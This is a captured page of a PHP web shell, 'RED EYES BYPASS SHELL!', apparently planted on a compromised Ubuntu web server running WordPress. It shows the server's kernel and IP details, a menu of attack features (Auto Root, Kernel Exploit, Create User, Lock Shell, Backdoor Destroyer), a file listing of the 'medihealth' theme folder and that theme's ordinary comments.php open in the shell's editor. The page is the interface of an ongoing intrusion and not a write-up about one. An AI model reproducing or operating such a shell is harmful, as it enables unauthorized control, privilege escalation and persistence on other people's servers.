Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
human /
wp-content /
themes /
medihealth /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
sections
[ DIR ]
drwxr-xr-x
webfonts
[ DIR ]
drwxr-xr-x
archive.php
2.67
KB
-rwxr-xr-x
breadcrumb.php
451
B
-rwxr-xr-x
category.php
2.67
KB
-rwxr-xr-x
class-tgm-plugin-activation.php
120.18
KB
-rwxr-xr-x
comments.php
1.97
KB
-rwxr-xr-x
content-aside.php
1.77
KB
-rwxr-xr-x
content-gallery.php
1.77
KB
-rwxr-xr-x
content.php
2.39
KB
-rwxr-xr-x
custom-comments.php
2.52
KB
-rwxr-xr-x
footer.php
2.5
KB
-rwxr-xr-x
front-page.php
1.21
KB
-rwxr-xr-x
functions.php
9.71
KB
-rwxr-xr-x
header.php
5.19
KB
-rwxr-xr-x
index.php
4.45
KB
-rwxr-xr-x
page.php
4.27
KB
-rwxr-xr-x
readme.txt
7.38
KB
-rwxr-xr-x
screenshot.png
1.03
MB
-rwxr-xr-x
searchform.php
417
B
-rwxr-xr-x
sidebar-footer.php
689
B
-rwxr-xr-x
sidebar-woocommerce.php
188
B
-rwxr-xr-x
single.php
7.24
KB
-rwxr-xr-x
style.css
126.86
KB
-rwxr-xr-x
tag.php
2.62
KB
-rwxr-xr-x
woocommerce.php
828
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php /** * Comments * * @package MediHealth WordPress theme */ if( post_password_required() ) { return; } ?> <!-- Comments Area --> <div id="comments" class="comments-area"> <?php $medihealth_fields=array( 'author' => '<div class="form-group"></span></label><input class="form-control" name="author" id="author" value="" type="text" placeholder="'. esc_attr__("Name*",'medihealth').'" /></div>', 'email' => '<div class="form-group"></span></label><input class="form-control" name="email" id="email" value="" type="email" placeholder="'. esc_attr__("Email*",'medihealth').'" ></div>', 'website' => '<div class="form-group"></span></label><input class="form-control" name="website" id="website" value="" ype="text" placeholder="'. esc_attr__("Website",'medihealth').'" ></div>', ); function medihealth_comment_fields($medihealth_fields) { return $medihealth_fields; } add_filter('comment_form_default_fields','medihealth_comment_fields'); $defaults = array( 'fields'=> apply_filters( 'medihealth_comment_form_default_fields', $medihealth_fields ), 'comment_field'=> '<div class="form-group"><textarea id="comments" rows="5" class="form-control" name="comment" type="text" ></textarea></div>', 'logged_in_as' => '<p class="logged-in-as">' . esc_html__( "Logged in as",'medihealth' ).' '.'<a href="'. esc_url(admin_url( 'profile.php' )).'">'. esc_html( $user_identity ).'</a>'. '. '. '<a href="'. wp_logout_url( get_permalink() ).'" title="'. esc_attr__("Log out of this account",'medihealth').'">'.esc_html__("Logout",'medihealth').'</a>' . '</p>', 'id_submit'=> 'submit', 'label_submit'=>esc_html__( 'Send Message','medihealth'), 'comment_notes_after'=> '', 'title_reply'=> '<div class="theme-comment-title"><h5>'.esc_html__('Please Post Your Comments & Reviews','medihealth').'</h5></div>', 'id_form'=> 'action' ); comment_form($defaults); ?> </div> <!-- Comments Area -->
Close